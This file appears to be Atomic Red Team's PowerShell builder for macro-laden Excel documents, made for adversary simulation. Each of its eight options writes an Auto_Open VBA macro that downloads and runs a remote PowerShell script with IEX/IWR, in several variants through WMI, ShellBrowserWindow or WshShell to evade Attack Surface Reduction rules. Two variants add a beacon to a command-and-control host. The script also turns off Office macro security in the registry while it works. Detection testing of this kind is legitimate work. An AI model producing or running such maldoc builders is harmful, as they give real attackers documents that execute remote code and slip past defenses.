Michael Haag
b51284297d
Adding the following: - New DragonsTail Chain reaction that does not execute Mimikatz. - Generic .HTA file with supporting markdown file highlighting details. - Generic `Atomic.doc` with supporting markdown file highlighting embedded macro. - Guide (markdown) explaining how to zip files to simulate email borne threats. - Simple guide on how to setup a "Listener" for C2 communication in Python and Powershell. - Generate-Macro.ps1 - Builder script that will generate 8 different macro embedded XLS files to simulate macro techniques actively being used.
561 lines
21 KiB
PowerShell
561 lines
21 KiB
PowerShell
#Adopted and Originally Coded by Matt Nelson (@enigma0x3)
|
|
#Reference: https://github.com/enigma0x3/Generate-Macro/blob/master/Generate-Macro.ps1
|
|
<#
|
|
.SYNOPSIS
|
|
|
|
Standalone Powershell script that will generate a malicious Microsoft Office document with a specified payload and persistence method
|
|
|
|
.DESCRIPTION
|
|
|
|
This script will generate malicious Microsoft Excel Documents that contain VBA macros.
|
|
The script will display a menu of different attacks, all with different ASR Bypass methods. Once an attack is chosen.
|
|
|
|
When naming the document, don't include a file extension.
|
|
|
|
License: BSD 3-Clause
|
|
Required Dependencies: None
|
|
Optional Dependencies: None
|
|
|
|
.Attack Types
|
|
|
|
All 7 instances represent different ASR Bypasses based on research performed by great folks within the industry. All macros were absorbed from https://gist.github.com/infosecn1nja/24a733c5b3f0e5a8b6f0ca2cf75967e3.
|
|
|
|
Additional references:
|
|
|
|
- https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
|
|
- https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
|
|
- https://www.darkoperator.com/blog/2017/11/8/windows-defender-exploit-guard-asr-obfuscated-script-rule
|
|
- https://posts.specterops.io/the-emet-attack-surface-reduction-replacement-in-windows-10-rs3-the-good-the-bad-and-the-ugly-34d5a253f3df
|
|
- https://oddvar.moe/2018/03/15/windows-defender-attack-surface-reduction-rules-bypass/
|
|
|
|
.EXAMPLE
|
|
|
|
PS> ./Generate-Macro.ps1
|
|
Enter the name of the document (Do not include a file extension): FinancialData
|
|
|
|
--------Select Attack---------
|
|
1. Chain Reaction Download and execute with Excel.
|
|
2. Chain Reaction Download and execute with Excel, wmiprvse
|
|
3. Chain Reaction Download and execute with Excel, wmiprvse benign
|
|
4. Chain Reaction Download and execute with Excel Shell
|
|
5. Chain Reaction Download and execute with Excel ShellBrowserWindow
|
|
6. Chain Reaction Download and execute with Excel WshShell
|
|
7. Chain Reaction Download and execute with Excel and POST C2.
|
|
8. Chain Reaction Download and execute with Excel and GET C2.
|
|
------------------------------
|
|
|
|
Saved to file C:\Users\Malware\Desktop\FinancialData.xls
|
|
PS>
|
|
|
|
#>
|
|
|
|
$global:defLoc = "$env:userprofile\Desktop"
|
|
$global:Name = Read-Host "Enter the name of the document (Do not include a file extension)"
|
|
$global:Name = $global:Name + ".xls"
|
|
$global:FullName = "$global:defLoc\$global:Name"
|
|
|
|
|
|
function Excel-Shell {
|
|
<#
|
|
.SYNOPSIS
|
|
Standard macro execution.
|
|
.DESCRIPTION
|
|
Upon execution, Excel will spawn cmd.exe to download and execute a chain reaction via powershell.
|
|
#>
|
|
#create macro
|
|
|
|
$Code = @"
|
|
Sub Auto_Open()
|
|
Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
|
|
End Sub
|
|
"@
|
|
|
|
#Create excel document
|
|
$Excel01 = New-Object -ComObject "Excel.Application"
|
|
$ExcelVersion = $Excel01.Version
|
|
|
|
#Disable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
|
|
$Excel01.DisplayAlerts = $false
|
|
$Excel01.DisplayAlerts = "wdAlertsNone"
|
|
$Excel01.Visible = $false
|
|
$Workbook01 = $Excel01.Workbooks.Add(1)
|
|
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
|
|
|
|
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
|
|
$ExcelModule.CodeModule.AddFromString($Code)
|
|
|
|
#Save the document
|
|
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
|
|
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
|
|
Write-Output "Saved to file $global:Fullname"
|
|
|
|
#Cleanup
|
|
$Excel01.Workbooks.Close()
|
|
$Excel01.Quit()
|
|
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
|
|
$Excel01 = $Null
|
|
if (ps excel){kill -name excel}
|
|
|
|
#Enable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
|
|
}
|
|
|
|
function Excel-Com-Wmiprvse-Benign-Trampoline {
|
|
<#
|
|
.SYNOPSIS
|
|
Uses COM to download and execute a chain reaction via wmiprvse. This version will not execute mimikatz.
|
|
.DESCRIPTION
|
|
Using COM, upon macro execution, wmiprvse will spawn cmd.exe to run powershell to download and execute a benign chain reaction.
|
|
#>
|
|
|
|
#create macro
|
|
|
|
$Code = @"
|
|
Sub Auto_Open()
|
|
Const HIDDEN_WINDOW = 0
|
|
strComputer = "."
|
|
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
|
|
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
|
|
Set objConfig = objStartup.SpawnInstance_
|
|
objConfig.ShowWindow = HIDDEN_WINDOW
|
|
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
|
|
objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail_benign.ps1')", Null, objConfig, intProcessID
|
|
End Sub
|
|
"@
|
|
|
|
#Create excel document
|
|
$Excel01 = New-Object -ComObject "Excel.Application"
|
|
$ExcelVersion = $Excel01.Version
|
|
|
|
#Disable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
|
|
$Excel01.DisplayAlerts = $false
|
|
$Excel01.DisplayAlerts = "wdAlertsNone"
|
|
$Excel01.Visible = $false
|
|
$Workbook01 = $Excel01.Workbooks.Add(1)
|
|
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
|
|
|
|
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
|
|
$ExcelModule.CodeModule.AddFromString($Code)
|
|
|
|
#Save the document
|
|
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
|
|
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
|
|
Write-Output "Saved to file $global:Fullname"
|
|
|
|
#Cleanup
|
|
$Excel01.Workbooks.Close()
|
|
$Excel01.Quit()
|
|
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
|
|
$Excel01 = $Null
|
|
if (ps excel){kill -name excel}
|
|
|
|
#Enable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
|
|
}
|
|
|
|
function Excel-Com-Wmiprvse-Trampoline {
|
|
<#
|
|
.SYNOPSIS
|
|
Uses COM to download and execute chain reaction via wmiprvse.
|
|
.DESCRIPTION
|
|
Using COM, upon macro execution, wmiprvse will spawn cmd.exe to run powershell to download and execute a benign chain reaction.
|
|
#>
|
|
|
|
#create macro
|
|
|
|
$Code = @"
|
|
Sub Auto_Open()
|
|
Const HIDDEN_WINDOW = 0
|
|
strComputer = "."
|
|
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
|
|
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
|
|
Set objConfig = objStartup.SpawnInstance_
|
|
objConfig.ShowWindow = HIDDEN_WINDOW
|
|
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
|
|
objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", Null, objConfig, intProcessID
|
|
End Sub
|
|
"@
|
|
|
|
#Create excel document
|
|
$Excel01 = New-Object -ComObject "Excel.Application"
|
|
$ExcelVersion = $Excel01.Version
|
|
|
|
#Disable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
|
|
$Excel01.DisplayAlerts = $false
|
|
$Excel01.DisplayAlerts = "wdAlertsNone"
|
|
$Excel01.Visible = $false
|
|
$Workbook01 = $Excel01.Workbooks.Add(1)
|
|
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
|
|
|
|
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
|
|
$ExcelModule.CodeModule.AddFromString($Code)
|
|
|
|
#Save the document
|
|
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
|
|
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
|
|
Write-Output "Saved to file $global:Fullname"
|
|
|
|
#Cleanup
|
|
$Excel01.Workbooks.Close()
|
|
$Excel01.Quit()
|
|
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
|
|
$Excel01 = $Null
|
|
if (ps excel){kill -name excel}
|
|
|
|
#Enable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
|
|
}
|
|
|
|
function Excel-Com-Trampoline {
|
|
<#
|
|
.SYNOPSIS
|
|
Excel COM Trampoline.
|
|
.DESCRIPTION
|
|
Using COM, upon macro execution, wmiprvse will spawn cmd.exe to run powershell to download and execute a chain reaction.
|
|
#>
|
|
|
|
#create macro
|
|
|
|
$Code = @"
|
|
Sub Auto_Open()
|
|
Const ShellWindows = _
|
|
"{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
|
|
Set SW = GetObject("new:" & ShellWindows).Item()
|
|
SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe IWR -uri ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1"" -OutFile ""~\Documents\payload.bat"" ; ~\Documents\payload.bat", "C:\Windows\System32", Null, 0
|
|
End Sub
|
|
"@
|
|
|
|
#Create excel document
|
|
$Excel01 = New-Object -ComObject "Excel.Application"
|
|
$ExcelVersion = $Excel01.Version
|
|
|
|
#Disable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
|
|
$Excel01.DisplayAlerts = $false
|
|
$Excel01.DisplayAlerts = "wdAlertsNone"
|
|
$Excel01.Visible = $false
|
|
$Workbook01 = $Excel01.Workbooks.Add(1)
|
|
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
|
|
|
|
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
|
|
$ExcelModule.CodeModule.AddFromString($Code)
|
|
|
|
#Save the document
|
|
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
|
|
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
|
|
Write-Output "Saved to file $global:Fullname"
|
|
|
|
#Cleanup
|
|
$Excel01.Workbooks.Close()
|
|
$Excel01.Quit()
|
|
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
|
|
$Excel01 = $Null
|
|
if (ps excel){kill -name excel}
|
|
|
|
#Enable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
|
|
}
|
|
|
|
function Excel-Com-ShellBrowserWindow {
|
|
<#
|
|
.SYNOPSIS
|
|
Excel COM Trampoline.
|
|
.DESCRIPTION
|
|
Using COM, upon macro execution, svchost/explorer will spawn cmd.exe to run powershell to download and execute a chain reaction.
|
|
#>
|
|
|
|
#create macro
|
|
|
|
$Code = @"
|
|
Sub Auto_Open()
|
|
Const ShellBrowserWindow = _
|
|
"{C08AFD90-F2A1-11D1-8455-00A0C91F3880}"
|
|
Set SBW = GetObject("new:" & ShellBrowserWindow)
|
|
SBW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe IWR -uri ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1"" -OutFile ""~\Documents\payload.bat"" ; ~\Documents\payload.bat", "C:\Windows\System32", Null, 0
|
|
End Sub
|
|
"@
|
|
|
|
#Create excel document
|
|
$Excel01 = New-Object -ComObject "Excel.Application"
|
|
$ExcelVersion = $Excel01.Version
|
|
|
|
#Disable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
|
|
$Excel01.DisplayAlerts = $false
|
|
$Excel01.DisplayAlerts = "wdAlertsNone"
|
|
$Excel01.Visible = $false
|
|
$Workbook01 = $Excel01.Workbooks.Add(1)
|
|
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
|
|
|
|
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
|
|
$ExcelModule.CodeModule.AddFromString($Code)
|
|
|
|
#Save the document
|
|
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
|
|
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
|
|
Write-Output "Saved to file $global:Fullname"
|
|
|
|
#Cleanup
|
|
$Excel01.Workbooks.Close()
|
|
$Excel01.Quit()
|
|
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
|
|
$Excel01 = $Null
|
|
if (ps excel){kill -name excel}
|
|
|
|
#Enable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
|
|
}
|
|
|
|
function Excel-Com-wshshell {
|
|
<#
|
|
.SYNOPSIS
|
|
Excel COM WshShell.
|
|
.DESCRIPTION
|
|
Using COM, upon macro execution, svchost/explorer will spawn cmd.exe to run powershell to download and execute a chain reaction.
|
|
#>
|
|
|
|
#create macro
|
|
|
|
$Code = @"
|
|
Sub Auto_Open()
|
|
Set WshShell = CreateObject("WScript.Shell")
|
|
Set WshShellExec = WshShell.Exec("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')")
|
|
End Sub
|
|
"@
|
|
|
|
#Create excel document
|
|
$Excel01 = New-Object -ComObject "Excel.Application"
|
|
$ExcelVersion = $Excel01.Version
|
|
|
|
#Disable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
|
|
$Excel01.DisplayAlerts = $false
|
|
$Excel01.DisplayAlerts = "wdAlertsNone"
|
|
$Excel01.Visible = $false
|
|
$Workbook01 = $Excel01.Workbooks.Add(1)
|
|
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
|
|
|
|
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
|
|
$ExcelModule.CodeModule.AddFromString($Code)
|
|
|
|
#Save the document
|
|
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
|
|
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
|
|
Write-Output "Saved to file $global:Fullname"
|
|
|
|
#Cleanup
|
|
$Excel01.Workbooks.Close()
|
|
$Excel01.Quit()
|
|
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
|
|
$Excel01 = $Null
|
|
if (ps excel){kill -name excel}
|
|
|
|
#Enable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
|
|
}
|
|
|
|
function Excel-Shell-C2-GET {
|
|
<#
|
|
.SYNOPSIS
|
|
Standard macro execution.
|
|
.DESCRIPTION
|
|
Upon execution, Excel will spawn cmd.exe to download and execute a chain reaction via powershell.
|
|
#>
|
|
|
|
#create macro
|
|
|
|
$Code = @"
|
|
Sub Auto_Open()
|
|
|
|
Execute
|
|
C2
|
|
|
|
End Sub
|
|
|
|
Public Function Execute() As Variant
|
|
Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
|
|
End Function
|
|
|
|
Public Function C2() As Variant
|
|
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
|
|
URL = "http://www.example.com"
|
|
objHTTP.Open "GET", URL, False
|
|
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
|
|
objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
|
|
objHTTP.send ("ART=AtomicRedTeam")
|
|
End Function
|
|
"@
|
|
|
|
#Create excel document
|
|
$Excel01 = New-Object -ComObject "Excel.Application"
|
|
$ExcelVersion = $Excel01.Version
|
|
|
|
#Disable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
|
|
$Excel01.DisplayAlerts = $false
|
|
$Excel01.DisplayAlerts = "wdAlertsNone"
|
|
$Excel01.Visible = $false
|
|
$Workbook01 = $Excel01.Workbooks.Add(1)
|
|
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
|
|
|
|
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
|
|
$ExcelModule.CodeModule.AddFromString($Code)
|
|
|
|
#Save the document
|
|
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
|
|
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
|
|
Write-Output "Saved to file $global:Fullname"
|
|
|
|
#Cleanup
|
|
$Excel01.Workbooks.Close()
|
|
$Excel01.Quit()
|
|
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
|
|
$Excel01 = $Null
|
|
if (ps excel){kill -name excel}
|
|
|
|
#Enable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
|
|
}
|
|
|
|
function Excel-Shell-C2-POST {
|
|
<#
|
|
.SYNOPSIS
|
|
Standard macro execution.
|
|
.DESCRIPTION
|
|
Upon execution, Excel will spawn cmd.exe to download and execute a chain reaction via powershell.
|
|
#>
|
|
|
|
#create macro
|
|
|
|
$Code = @"
|
|
Sub Auto_Open()
|
|
|
|
Execute
|
|
C2
|
|
|
|
End Sub
|
|
|
|
Public Function Execute() As Variant
|
|
Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
|
|
End Function
|
|
|
|
Public Function C2() As Variant
|
|
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
|
|
URL = "http://www.example.com"
|
|
objHTTP.Open "POST", URL, False
|
|
objHTTP.setRequestHeader "User-Agent", "Mozilla (compatible; MSIE 6.0; Windows NT 5.0)"
|
|
objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
|
|
objHTTP.send ("ART=AtomicRedTeam")
|
|
End Function
|
|
"@
|
|
|
|
#Create excel document
|
|
$Excel01 = New-Object -ComObject "Excel.Application"
|
|
$ExcelVersion = $Excel01.Version
|
|
|
|
#Disable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
|
|
|
|
$Excel01.DisplayAlerts = $false
|
|
$Excel01.DisplayAlerts = "wdAlertsNone"
|
|
$Excel01.Visible = $false
|
|
$Workbook01 = $Excel01.Workbooks.Add(1)
|
|
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
|
|
|
|
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
|
|
$ExcelModule.CodeModule.AddFromString($Code)
|
|
|
|
#Save the document
|
|
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
|
|
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
|
|
Write-Output "Saved to file $global:Fullname"
|
|
|
|
#Cleanup
|
|
$Excel01.Workbooks.Close()
|
|
$Excel01.Quit()
|
|
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
|
|
$Excel01 = $Null
|
|
if (ps excel){kill -name excel}
|
|
|
|
#Enable Macro Security
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
|
|
|
|
}
|
|
|
|
#Determine Attack
|
|
Do {
|
|
Write-Host "
|
|
--------Select Attack---------
|
|
1. Chain Reaction Download and execute with Excel.
|
|
2. Chain Reaction Download and execute with Excel, wmiprvse
|
|
3. Chain Reaction Download and execute with Excel, wmiprvse benign
|
|
4. Chain Reaction Download and execute with Excel Shell
|
|
5. Chain Reaction Download and execute with Excel ShellBrowserWindow
|
|
6. Chain Reaction Download and execute with Excel WshShell
|
|
7. Chain Reaction Download and execute with Excel and POST C2.
|
|
8. Chain Reaction Download and execute with Excel and GET C2.
|
|
------------------------------"
|
|
$AttackNum = Read-Host -prompt "Select Attack Number & Press Enter"
|
|
} until ($AttackNum -eq "1" -or $AttackNum -eq "2" -or $AttackNum -eq "3" -or $AttackNum -eq "4" -or $AttackNum -eq "5" -or $AttackNum -eq "6" -or $AttackNum -eq "7" -or $AttackNum -eq "8")
|
|
|
|
|
|
#Initiate Attack Choice
|
|
|
|
if($AttackNum -eq "1"){
|
|
Excel-Com-Trampoline
|
|
}
|
|
elseif($AttackNum -eq "2"){
|
|
Excel-Com-Wmiprvse-Trampoline
|
|
}
|
|
elseif($AttackNum -eq "3"){
|
|
Excel-Com-Wmiprvse-Benign-Trampoline
|
|
}
|
|
elseif($AttackNum -eq "4"){
|
|
Excel-Shell
|
|
}
|
|
elseif($AttackNum -eq "5"){
|
|
Excel-Com-ShellBrowserWindow
|
|
}
|
|
elseif($AttackNum -eq "6"){
|
|
Excel-Com-wshshell
|
|
}
|
|
elseif($AttackNum -eq "7"){
|
|
Excel-Shell-C2-POST
|
|
}
|
|
elseif($AttackNum -eq "8"){
|
|
Excel-Shell-C2-GET
|
|
}
|